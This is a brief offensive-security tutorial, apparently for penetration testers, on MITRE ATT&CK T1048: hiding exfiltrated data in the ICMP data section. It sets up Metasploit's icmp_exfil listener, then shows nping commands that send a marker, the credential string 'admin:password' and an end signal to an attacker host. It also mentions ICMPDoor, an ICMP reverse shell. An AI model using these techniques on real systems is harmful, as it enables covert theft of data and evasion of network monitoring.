MITRE ATT&CK™ - Exfiltration Over Alternative Protocol - Technique T1048
Theory
The Internet Control Message Protocol ICMP. It is a network layer protocol used to handle error reporting.
ICMP Data Section
On a high level, the ICMP packet's structure contains a Data section that can include strings or copies of other information, such as the IPv4 header, used for error messages. The following diagram shows the Data section, which is optional to use.
We can leverage this section in order to exfiltrate datas.
Practice
We can, on linux targets, exfiltrate datas with the -p options of the ping command.
Note that the -p option is only available for Linux operating systems. We can confirm that by checking the ping's help manual page.
let's set up the Metasploit framework by selecting the icmp_exfil module to make it ready to capture and listen for ICMP traffic. One of the requirements for this module is to set the BPF_FILTER option, which is based on TCPDUMP rules, to capture only ICMP packets and ignore any ICMP packets that have the source IP of the attacking machine as follows.
#First, send the BOF triggerv4resk@victime$sudonping--icmp-c1ATTACKING_IP--data-string"BOFfile.txt"#Datasv4resk@victime$sudonping--icmp-c1ATTACKING_IP--data-string"admin:password"#EOF end signalv4resk@victime$sudonping--icmp-c1ATTACKING_IP--data-string"EOF"
ICMPDoor is an open-source reverse-shell written in Python3 and scapy. The tool uses the same concept we discussed earlier, where an attacker utilizes the Data section within the ICMP packet. The only difference is that an attacker sends a command that needs to be executed on a victim's machine. Once the command is executed, a victim machine sends the execution output within the ICMP packet in the Data section.